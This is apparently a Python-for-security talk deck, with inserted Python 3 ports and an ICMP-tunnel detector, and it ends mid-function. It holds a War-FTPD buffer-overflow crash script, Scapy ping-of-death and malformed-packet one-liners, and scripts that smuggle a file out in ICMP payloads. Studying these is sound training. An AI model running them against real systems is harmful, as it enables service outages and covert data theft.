>>> import antigravity
Overview of Python
Flying made simple without the Nyquil hangover
Keith Dixon
@Tazdrumm3r
Agenda
•   About me
•   About Python
•   Python basics
•   Python’s uses
•   Coding for Penetration Testers book
•   Tips, tricks, observations
•   Resources
About me
Who am I?
• Husband/father/geek/gets distracted by shiny objects easily
• Career path switched to IT in 1999, professionally in IT since 2001
   – Learning, studying, and currently interviewing for infosec professional roles
• Vbscript – 2007
• Python – 2011
About Python
• Conceived in the late 1980’s by Guido van Rossum at CWI.
• Python 2.0 was released on October 16th, 2000.
• Python 3.0 was released in December 2008.
What is Python good for?
• Python comes with a large standard library that covers areas such as:
   • string processing
   • Internet protocols
   • software engineering
   • operating system interfaces
   • Artificial intelligence (because of similarities to Lisp)
Extensive use in the information security industry
   • Exploit development
   • Network
   • Debugging
   • Reverse engineering
   • Fuzzing
   • Web
   • Forensics
   • Malware analysis
   • PDF
What is Python good for?
• Easy to write short scripts for system admin work.
• Python code is easy to understand.
   • Once the basic syntax is learned, even the most complicated scripts can make sense.
• Python is cross platform!!
   • It will work on Linux, Windows, Mac and most every other OS.
• Many, many resources and a big, friendly community
Python tools
• Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element.
• Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems.
• Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network.
• Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library
• Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages
• W3af - a Web Application Attack and Audit Framework.
Inspiration for the idea? (Part 1)
Inspiration for the idea? (Part 2)
Post CSAW CTF
Python 101
• Indentation does matter

  This will work:

    startNumber = int(raw_input("Enter the start number here "))
    endNumber = int(raw_input("Enter the end number here "))

    def fib(n):
        if n < 2:
            return n
        return fib(n-2) + fib(n-1)

    print map(fib, range(startNumber, endNumber))

  But this won’t (the second return sits outside the function body, so Python refuses to even compile it: "SyntaxError: 'return' outside function"):

    startNumber = int(raw_input("Enter the start number here "))
    endNumber = int(raw_input("Enter the end number here "))

    def fib(n):
        if n < 2:
            return n
    return fib(n-2) + fib(n-1)

    print map(fib, range(startNumber, endNumber))
Python 101
• All scripts are considered modules
    • All functions inside a module can be used, or only certain methods can be used inside a script

      Entire module:     >>> import sys
      Partial method:    >>> from sys import argv

• Help is built in

      Help on modules:
      >>> import sys, hashlib
      >>> help(sys)
      >>> help(hashlib)
      keith@dw ~$ pydoc sys
      keith@dw ~$ pydoc hashlib

      Help on methods:
      >>> import sys, hashlib
      >>> help(sys.argv)
      >>> help(hashlib.sha512)
      keith@dw ~$ pydoc sys.argv
      keith@dw ~$ pydoc hashlib.sha512
Python 101
• It can be run interactively

  Via command prompt:
      keith@dw ~ $ python
      Python 2.7.2
      Type "help", "copyright"...
      >>>

  Via shell:
      • IDLE
      • DreamPie
      • IPython

• Scripts

  Windows
      File extensions
      • *.py – Python script
      • *.pyc – Compiled Python file (generated by running the script)
      Running scripts
      • .py file extension associated with python.exe
      • Should have #!/usr/bin/python at the top of the script in case you want to run it on Linux
      • If the path to the interpreter is in your system path, you can double-click the script to run it, otherwise…
        C:\Users\Keith>python password.py

  Linux
      File extensions (optional)
      • *.py – Python script
      • *.pyc – Compiled Python file (generated by running the script)
      Running scripts
      • Must have #!/usr/bin/python (path to python) at the top of the script
      • If you’re running it from the terminal, the script must be chmod’ed to make it executable, or you can call python and the script name…
        keith@dw ~ $ python password.py
Python 102
• Data types

  Numbers
      A = 10
      B = 0100 or B = 0x41 or B = 0b1000000
      C = 3.56
      D = 3.16j
      • Integers
      • Long integers (octal, hex, binary)
      • Float
      • complex

  String
      A = 'This is a string'
      print A            # This is a string
      print A[0]         # T
      print A[3:6]       # s i
      print A[4:]        #  is a string
      print A * 2
      print A + " and this is how it prints"

  List (mutable)
      # named mylist rather than list, which would shadow the built-in type
      mylist = ['abc', 45, 'The Avengers', 0x67, 'def', 15.5]
      print mylist
      print mylist[0]
      print mylist[1:3]
      print mylist[2:]
      mylist.append("Detroit")
      # mylist is now ['abc', 45, 'The Avengers', 103, 'def', 15.5, 'Detroit']

  Tuple (immutable)
      mytuple = ('abc', 45, 'The Avengers', 0x67, 'def', 15.5)
      print mytuple
      print mytuple[0]
      print mytuple[1:3]
      print mytuple[2:]
      mytuple.append("Detroit")
      # AttributeError: 'tuple' object has no attribute 'append'

• Conditional statements

  If statement
      if x == True:        # "if x:" is the idiomatic spelling; a single "=" is assignment and a syntax error here
          print True

  Else statement
      if x == 1:
          print "1"
      else:
          print "not 1"

  Elif statement
      if expression1:
          statement(s)
      elif expression2:
          statement(s)
      else:
          statement(s)
Python 102
• Looping

  While loop
      count = 0
      while (count < 9):
          print 'The count is:', count
          count = count + 1

      print "Good bye!"

  For loop
      code1 = sys.argv[1]
      code_split = code1.split(':')

      for i in code_split:
          code1a = int(i)
          codefinal = chr(code1a)
          sys.stdout.write(codefinal)

  Loop control
      count = 0
      while (count < 9):
          print 'The count is:', count
          count = count + 1
          if count == 7:       # "==" compares; "=" would be a syntax error inside an if
              break

      print "Good bye!"

• Functions

  Creating a function
      def base64_decode(base64_key):
          answer = base64_key.decode('base64', 'strict')
          print answer

  In use
      >>> csaw.base64_decode('V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlhbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==')
      Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
Python 102
• Files

  Open a file for reading
      #!/usr/bin/python

      f = open('base64.txt', 'r')
      file = f.read()
      answer = file.decode('base64', 'strict')
      print answer
      f.close()

  Write to a file
      #!/usr/bin/python

      import sys

      if len(sys.argv) < 2:
          sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>\n")
      basecode = sys.argv[1]
      answer = basecode.decode('base64', 'strict')
      print answer
      fo = open("base64.txt", "w")
      fo.write(answer)
      fo.close()

• Input/output

  raw_input
      #!/usr/bin/python

      text = raw_input("Enter your input: ")
      print "Received input is : ", text

      Input is:  Thanks for coming to Bsides
      Output is: Received input is :  Thanks for coming to Bsides

  input
      #!/usr/bin/python

      text = input("Enter your input: ")
      print "Received input is : ", text

      Input is:  5 * 5
      Output is: Received input is :  25

  In Python 2, input() evaluates whatever is typed as a Python expression, which is why "5 * 5" comes back as 25; raw_input() returns the typed text unchanged.
Python’s uses – General scripting


• Cryptography
• Password creation
• Use files (write to/read from)
Cryptography
Encode Base64 code

#!/usr/bin/python

code = raw_input("Enter the data you wish to be encoded to Base64: ")
answer = code.encode('base64', 'strict')
print answer

Encode ROT13 code

#!/usr/bin/python

code = raw_input("Enter the data you wish to be encoded to ROT13: ")
answer = code.encode('rot13', 'strict')
print answer
Decrypt module
   #!/usr/bin/python
   # Decoders for the encodings met in CTF challenges; each writes the decoded text to stdout.

   import binascii
   import math
   import sys

   def hexdecode(hex_key):
       # Colon-separated hex bytes, e.g. "48:65:6c"
       hex_split = hex_key.split(':')
       for decode in hex_split:
           hex_decode = binascii.a2b_hex(decode)
           sys.stdout.write(hex_decode)

   def uni_decode(unicode_key):
       # Colon-separated decimal code points, e.g. "72:105"
       unicode_split = unicode_key.split(':')
       for i in unicode_split:
           code1a = int(i)
           codefinal = chr(code1a)
           sys.stdout.write(codefinal)

   def base64_decode(base64_key):
       answer = base64_key.decode('base64', 'strict')
       print answer

   def binary_decode(binary_key):
       # Unseparated 8-bit groups, e.g. "0100100001101001"; f() slices the string into groups of l
       f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))]
       basecode = f(binary_key, 8)
       for code in basecode:
           decodea = int(code, 2)
           decodeb = chr(decodea)
           sys.stdout.write(decodeb)

   def rot13_decode(rot13_key):
       answer = rot13_key.decode('rot13', 'strict')
       print answer
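A Python 3 port of the decode module above, added here as an example and not part of the original slides. Python 3 has no str.decode('base64') or 'rot13' codecs, so it uses the base64 and codecs modules, returns strings instead of printing, and treats a binary string whose length is not a multiple of 8 as malformed (the slide's math.ceil slicing silently decoded a short trailing group).

```python
import base64
import binascii
import codecs


def hex_decode(hex_key):
    """Colon-separated hex bytes, e.g. "48:65:6c" -> "Hel" (one char per byte, as the original's raw write)."""
    raw = b"".join(binascii.unhexlify(part) for part in hex_key.split(":"))
    return raw.decode("latin-1")


def uni_decode(unicode_key):
    """Colon-separated decimal code points, e.g. "72:105" -> "Hi"."""
    return "".join(chr(int(part)) for part in unicode_key.split(":"))


def base64_decode(base64_key):
    """Standard Base64 with padding; validate=True rejects characters outside the alphabet."""
    return base64.b64decode(base64_key, validate=True).decode("utf-8")


def binary_decode(binary_key):
    """Unseparated 8-bit groups, e.g. "0100100001101001" -> "Hi".

    A trailing group shorter than 8 bits is rejected instead of being decoded as a smaller number.
    """
    if len(binary_key) % 8:
        raise ValueError("binary string length %d is not a multiple of 8" % len(binary_key))
    return "".join(chr(int(binary_key[i:i + 8], 2)) for i in range(0, len(binary_key), 8))


def rot13_decode(rot13_key):
    """ROT13 is its own inverse, so the same call encodes and decodes."""
    return codecs.decode(rot13_key, "rot_13")


# Dispatch table keyed by the encoding name used on the command line
DECODERS = {
    "hex": hex_decode,
    "uni": uni_decode,
    "base64": base64_decode,
    "binary": binary_decode,
    "rot13": rot13_decode,
}


def decode(kind, value):
    """Decode `value` with the named decoder; an unknown name raises KeyError."""
    return DECODERS[kind](value)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3 or sys.argv[1] not in DECODERS:
        sys.exit("Usage: %s <%s> <value>" % (sys.argv[0], "|".join(DECODERS)))
    print(decode(sys.argv[1], sys.argv[2]))
```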
Password creation
 ##Author: ATC
 ##Please score this on activestate
 import string, random, sys

 print "How many characters would you like the password to have?"
 print "Must be nine or more"
 length = int(raw_input())      # raw_input(), not input(): input() would evaluate whatever is typed
 if length < 9:
     sys.exit("Must be nine or more")
 password_len = length
 password = []
 # three characters from each class, so every class is represented
 for group in (string.ascii_letters, string.punctuation, string.digits):
     password += random.sample(group, 3)

 # fill the rest from the combined alphabet (random is not a cryptographic generator;
 # random.SystemRandom draws from the OS instead)
 password += random.sample(
            string.ascii_letters + string.punctuation + string.digits,
            password_len - len(password))

 random.shuffle(password)
 password = ''.join(password)

 print password



http://code.activestate.com/recipes/577905-password-generator/
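The same recipe rewritten for Python 3 with a cryptographic generator, added here as an example (not from the slides or the ActiveState recipe). It keeps the recipe's rules (three characters from each class, at least nine total, shuffled) but draws from secrets.SystemRandom instead of the random module, whose Mersenne Twister output is predictable once a few values are observed.

```python
import secrets
import string

# Same character classes the recipe draws from
GROUPS = (string.ascii_letters, string.punctuation, string.digits)
MIN_LENGTH = 9


def generate_password(length):
    """Build a password of `length` characters with at least three from each group."""
    if length < MIN_LENGTH:
        raise ValueError("length must be %d or more, got %d" % (MIN_LENGTH, length))
    rng = secrets.SystemRandom()          # OS CSPRNG (urandom / CryptGenRandom)
    chars = []
    for group in GROUPS:
        chars += rng.sample(group, 3)     # three distinct characters from each class
    alphabet = "".join(GROUPS)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    rng.shuffle(chars)                    # so the class-guaranteed characters are not all at the front
    return "".join(chars)


def meets_policy(password):
    """Check the property generate_password guarantees: length >= 9 and >= 3 chars from every group."""
    return len(password) >= MIN_LENGTH and all(
        sum(c in group for c in password) >= 3 for group in GROUPS
    )


if __name__ == "__main__":
    print(generate_password(16))
```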
Use files (write to/read from)
Read from a file

#!/usr/bin/python

f = open('base64.txt', 'r')
file = f.read()
answer = file.decode('base64', 'strict')
print answer
f.close()

Write to a file

#!/usr/bin/python

code = raw_input("Enter the data you wish to be encoded to Base64: ")
answer = code.encode('base64', 'strict')
f = open('base64.txt', 'w')
f.write(answer)
f.close()
Python’s uses – Networking
• Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
• Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Mallory: man-in-the-middle proxy for testing
• mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
• Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
• Knock Subdomain Scan: enumerate subdomains on a target domain through a wordlist
• pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
• libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
• dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
• pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
• Dirtbags py-pcap: read pcap files without libpcap
• flowgrep: grep through packet payloads using regular expressions
• httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
                                                           http://www.dirk-loss.de/python-tools.htm
Scapy                            www.secdev.org/projects/scapy/

• Packet creation
• Read PCAP files
• Create graphical dumps
    • Must have appropriate supporting tools installed
• Fuzzing
• Send and receive packets
• TCP traceroute (can do graphical dump as well)
• Sniffing
• Send and receive files through alternate data channels (ICMP)
• Ping
    • ARP ping
    • ICMP ping
    • TCP ping
    • UDP ping
• Wireless frame injection
• OS Fingerprinting
• Classic attacks
    • Malformed packets
    • Ping of death
    • Nestea attack
• ARP cache poisoning
• Scans
    • SYN scan
    • ACK scan
    • XMAS scan
    • IP scan
    • TCP port scan
    • IKE scan
• Advanced traceroute
    • TCP SYN traceroute
    • UDP traceroute
    • DNS traceroute
• VLAN hopping
• Wireless sniffing
• Firewalking
Scapy
• Packet creation
    • Stacking layers
• Read PCAP files
    • A = rdpcap("<directory where PCAP file is>/<pcap file>")
• Create graphical dumps
    • A[<packet number>].psdump("<location to store .eps file>", layer_shift=1)
Scapy
ConfickerB9hrs.pcap
Scapy
Send packets
• send(IP(dst="192.168.1.1")/ICMP())
• sendp(Ether()/IP(dst="192.168.1.1", ttl=(1,4)), iface="eth0")
• sendp(rdpcap("/tmp/pcapfile"))
• sendp("I'm travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
Scapy
Send and receive packets
• p = sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX")
• p = sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
• p.show()
• sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]))
• sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]), inter=0.5, retry=-2, timeout=1)
Scapy
Fuzzing
• send(IP(dst="192.168.1.10")/fuzz(ICMP()/NTP(version=4)), loop=1)
• send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)), loop=1)
TCP traceroute
• res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com"], dport=[80,443], maxttl=20, retry=-2)
Sniffing
• sniff(filter="icmp and host 66.35.250.151", count=2)
• a=_
• a.nsummary()
• a[1]




• sniff(iface="eth0", prn=lambda x: x.show())
Scapy
SYN scan
• sr1(IP(dst="72.14.207.99")/TCP(dport=80, flags="S"))
• ans,unans = sr(IP(dst="192.168.1.1")/TCP(sport=666, dport=(440,443), flags="S"))
• ans,unans = sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(), dport=[440,441,442,443], flags="S"))
    • ans.summary()
    • ans.summary(lambda (s,r): r.sprintf("%TCP.sport% \t %TCP.flags%"))
Scapy
Classic attacks
• Malformed packets
     • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
• Ping of death
     • send(fragment(IP(dst="192.168.1.10")/ICMP()/("X" * 60000)))
Scapy
To send packets via ICMP

#!/usr/bin/python
import sys

from scapy.all import *

conf.verb = 0          # silence Scapy's per-packet "Sent 1 packets." output

f = open(sys.argv[1])
data = f.read()
f.close()

host = sys.argv[2]

print "Data size is %d " % len(data)

# the file goes out in 32-byte slices, one per echo-reply
i = 0
while i < len(data):
    pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32]
    send(pack)
    i = i + 32
print "Data sent"
Scapy
To receive packets via ICMP

#!/usr/bin/python
import sys
from scapy.all import *

conf.verb = 0

f = open(sys.argv[1], "w")
host = sys.argv[2]
count = int(sys.argv[3])      # number of packets to capture, one 32-byte slice each

bpf = "icmp and host " + host
print "sniffing with filter (%s) for %d packets" % (bpf, count)

packets = sniff(count=count, filter=bpf)
for p in packets:
    if p.haslayer(Raw):       # an echo-reply with no payload has no Raw layer
        f.write(p[Raw].load)

f.close()
print "Data received"
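A detection-side counterpart to the two ICMP scripts above, added here as an example (not from the slides): a pure-Python parser, with no Scapy dependency, that walks raw IPv4/ICMP packets, flags echo-replies that answer no echo-request, and reassembles their payloads for the analyst. The capture is constructed inline with struct and mirrors the sender's 32-byte echo-reply slices with Scapy's default id=0/seq=0.

```python
import struct

PROTO_ICMP = 1
ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def icmp_checksum(data):
    """RFC 1071 one's-complement sum over the ICMP message, padded to 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_packet(src, dst, icmp_type, ident, seq, payload):
    """Constructed raw IPv4 + ICMP echo packet, used only as an offline test fixture."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", icmp_checksum(icmp)) + icmp[4:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64,
                         PROTO_ICMP, 0, bytes(map(int, src.split("."))),
                         bytes(map(int, dst.split("."))))
    return ip_hdr + icmp


def parse_packet(raw):
    """Return the ICMP fields of a raw IPv4 packet, or None if it is not ICMP."""
    ihl = (raw[0] & 0x0F) * 4
    if raw[9] != PROTO_ICMP or len(raw) < ihl + 8:
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", raw[ihl:ihl + 8])
    return {"src": ".".join(map(str, raw[12:16])), "dst": ".".join(map(str, raw[16:20])),
            "type": icmp_type, "id": ident, "seq": seq, "payload": raw[ihl + 8:]}


def unsolicited_replies(packets):
    """Echo-replies with no preceding echo-request for the same (hosts, id, seq).

    A normal ping produces request/reply pairs; the sender script above emits
    echo-replies only, so every one of its packets trips this check.
    """
    pending = set()
    flagged = []
    for raw in packets:
        pkt = parse_packet(raw)
        if pkt is None:
            continue
        if pkt["type"] == ICMP_ECHO_REQUEST:
            pending.add((pkt["dst"], pkt["src"], pkt["id"], pkt["seq"]))
        elif pkt["type"] == ICMP_ECHO_REPLY:
            key = (pkt["src"], pkt["dst"], pkt["id"], pkt["seq"])
            if key in pending:
                pending.discard(key)
            else:
                flagged.append(pkt)
    return flagged


def reassemble(flagged):
    """Concatenate flagged payloads per (src, dst), in arrival order, to show what was carried."""
    streams = {}
    for pkt in flagged:
        streams.setdefault((pkt["src"], pkt["dst"]), bytearray()).extend(pkt["payload"])
    return {k: bytes(v) for k, v in streams.items()}


# Constructed capture: one legitimate ping exchange, then a 61-byte "file" pushed
# in 32-byte echo-reply slices exactly as the sender script does.
SECRET = b"constructed sample text that is longer than one 32 byte chunk"
CAPTURE = [
    build_packet("10.0.0.5", "10.0.0.1", ICMP_ECHO_REQUEST, 0x1234, 1, b"ping-probe"),
    build_packet("10.0.0.1", "10.0.0.5", ICMP_ECHO_REPLY, 0x1234, 1, b"ping-probe"),
] + [
    build_packet("10.0.0.7", "10.0.0.9", ICMP_ECHO_REPLY, 0, 0, SECRET[i:i + 32])
    for i in range(0, len(SECRET), 32)
]

if __name__ == "__main__":
    hits = unsolicited_replies(CAPTURE)
    print("%d unsolicited echo-replies" % len(hits))
    for (src, dst), data in reassemble(hits).items():
        print("%s -> %s: %r" % (src, dst, data))
```

On a live host the same functions can be fed frames from a raw socket or a pcap reader; only the fixture is synthetic.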
Python’s uses – Debugging and Reverse Engineering
• Immunity Debugger: scriptable GUI and command line debugger
    • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
• Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
• IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
• pefile: read and work with Portable Executable (aka PE) files
• pydasm: Python interface to the libdasm x86 disassembling library
• PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
• uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
• diStorm64: disassembler library for AMD64, licensed under the BSD license
• python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
• vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it (mirror)
• Androguard: reverse engineering and analysis of Android applications

http://www.dirk-loss.de/python-tools.htm
Coding for Pentesters – Exploitation scripting

Building Exploits with Python
1. Windows XP SP0
2. War-FTPD v 1.65
3. Immunity Debugger

Step 1 – Open WarftpD with Immunity

Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.

Step 3 – Build this script and run it…. and enjoy the show

#!/usr/bin/python
import sys
import socket

hostname = sys.argv[1]
username = "A" * 1024
passwd = "anything"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except socket.error:
    print "[-] Connection error!"
    sys.exit(1)
r = sock.recv(1024)
print "[+] " + r

sock.send("user %s\r\n" % username)
r = sock.recv(1024)
print "[+] " + r
sock.send("pass %s\r\n" % passwd)
r = sock.recv(1024)
print "[+] " + r
sock.close()

The connection attempt with the user name of "AAAA…" (the 1024 "A" characters the script sends)

Step 4 - WarFTPD crashes!
Python’s uses – Malware analysis
• torwget.py: Multi-platform TOR-enabled URL
• clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules
• peid_to_yara.py: Convert PEiD packer signatures to YARA rules
• av_multiscan.py: Script to implement your own antivirus multi-scanner
• pescanner.py: Detect malicious PE file attributes
• ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep
• avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks
• dbmgr.py: Malware artifacts database manager
• artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware
• mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP
• googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts
• sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask
• vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests
• mybox.py: Sample automation script for VirtualBox based on vmauto.py
Python’s uses – Malware analysis
• myvmware.py: Sample automation script for VMware based on vmauto.py
• analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory
• scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files
• findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks
• pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report
• xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation
• trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor
• kraken.py: Immunity Debugger PyCommand for cracking Kraken’s Domain Generation Algorithm (DGA)
• sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings
• install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service
• dll2exe.py: Python script for converting a DLL into a standalone executable
• windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA
Python’s uses – Malware analysis
Practical Malware Analysis
• FakeNet - http://practicalmalwareanalysis.com/
Python’s uses – Malware analysis
• Cuckoo Sandbox - a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.
• yara-python: identify and classify malware samples
• pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
• Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
• pyClamAV: add virus detection capabilities to your Python software
• jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
• phoneyc: pure Python honeyclient implementation

http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
• Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up, including some tshark support and other features.
• Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
• Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
• antiparser: fuzz testing and fault injection API
• TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
• Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
• FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
• Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
• Fuzzbox: multi-codec media fuzzer
• Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
• Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
• WSBang: perform automated security testing of SOAP based web services
• Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
• fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
• Fusil: Python library used to write fuzzing programs

http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
Sickfuzz
Python’s uses – Web
• Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing.
• ProxMon: processes proxy logs and reports discovered issues
• Twill: browse the Web from a command-line interface. Supports automated Web testing
• Windmill: web testing tool designed to let you painlessly automate and debug your web application
• FunkLoad: functional and load web tester
• spynner: Programmatic web browsing module for Python with Javascript/AJAX support
• python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions

http://www.dirk-loss.de/python-tools.htm
Python’s uses – Web   http://snippets.scrapy.org/snippets/7/
Python’s uses – Forensics

• Volatility: extract digital artifacts from volatile memory (RAM) samples
• SandMan: read the hibernation file, regardless of Windows version
• LibForensics: library for developing digital forensics applications
• TrIDLib: identify file types from their binary signatures. Now includes Python binding
• aft: Android forensic toolkit

http://www.dirk-loss.de/python-tools.htm
Python’s uses – Forensics
Volatility
Python’s uses – Miscellaneous
• InlineEgg: toolbox of classes for writing small assembly programs in Python
• Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
• RevHosts: enumerate virtual hosts for a given IP address
• simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
• PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?)
• Hachoir: view and edit a binary stream field by field

Other useful libraries and tools
• IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
• Beautiful Soup: HTML parser optimized for screen-scraping
• Mayavi: 3D scientific data visualization and plotting
• Twisted: event-driven networking engine
• Suds: lightweight SOAP client for consuming Web Services
• M2Crypto: most complete OpenSSL wrapper
• NetworkX: graph library (edges, nodes)
• pyparsing: general parsing module
• lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
• Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
• Pexpect: control and automate other programs, similar to Don Libes' `Expect` system
• Sikuli: visual technology to search and automate GUIs using screenshots. Scriptable in Jython
• PyQt and PySide: Python bindings for the Qt application framework and GUI library

http://www.dirk-loss.de/python-tools.htm
Coding for Penetration Testers book
Script | Function | Learned
Webcheck_v1.py | Monitor web server – verify it remains up | 1. Script arguments; 2. Connect to web server and run a GET request
Webcheck_v2.py | Monitor web server – verify it remains up (default to port 80) | 1. Alternate script arguments method
Subnetcalc.py | Calculate subnet mask, broadcast address, network range, and gateway from IP/CIDR | 1. Parse out values programmatically; 2. Math functions with variables; 3. Displaying results; 4. Using FOR loops
Pass.py | Determines if users are using the original default assigned password | 1. Use the crypt module
Robotparser.py | Retrieve the paths from robots.txt | 1. Parse the robots.txt file with the built-in robotparser module; 2. Nesting FOR loops
root_check.py | Checks to see what permissions the logged-in account has (normal user, root or system account) | 1. Using IF and ELIF conditional statements; 2. Use the OS module to make system calls
Readshadow.py | Checks to see if you have permission to read /etc/shadow | 1. Use the OS module to make system calls; 2. Test permissions on files to see if the current credentials can read the file
Network_socket.py | Connect to website, pull contents (hard coded) | 1. Network socket creation; 2. Spaces will bite you in the ass where you least expect it.
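Subnetcalc.py in the table above covers the four lessons listed for it: parsing an IP/CIDR string, mask arithmetic, displaying results and FOR loops. The following is an added example written for this page, not the book's script and not code from the deck: the calculation done by hand with integer bit operations, cross-checked against the standard library's ipaddress module. The function names, the sample addresses and the "gateway = first usable host" convention are assumptions made here; it goes a little beyond the book's case by handling /31 and /32 and rejecting malformed input, which a script that takes its input from an argument should do.

```python
import ipaddress  # standard library; used only to cross-check the hand-rolled math
import sys


def parse_cidr(text):
    """Split '192.168.1.10/24' into (address as int, prefix length).
    Rejects a missing prefix, bad octets and out-of-range prefixes with ValueError."""
    ip_str, _, prefix_str = text.strip().partition("/")
    if not prefix_str.isdigit() or not 0 <= int(prefix_str) <= 32:
        raise ValueError("bad or missing prefix length in %r" % text)
    octets = ip_str.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("bad IPv4 address in %r" % text)
    ip_int = 0
    for octet in octets:               # fold the four octets into one 32-bit integer
        ip_int = (ip_int << 8) | int(octet)
    return ip_int, int(prefix_str)


def int_to_dotted(n):
    """Back from a 32-bit integer to dotted-quad text."""
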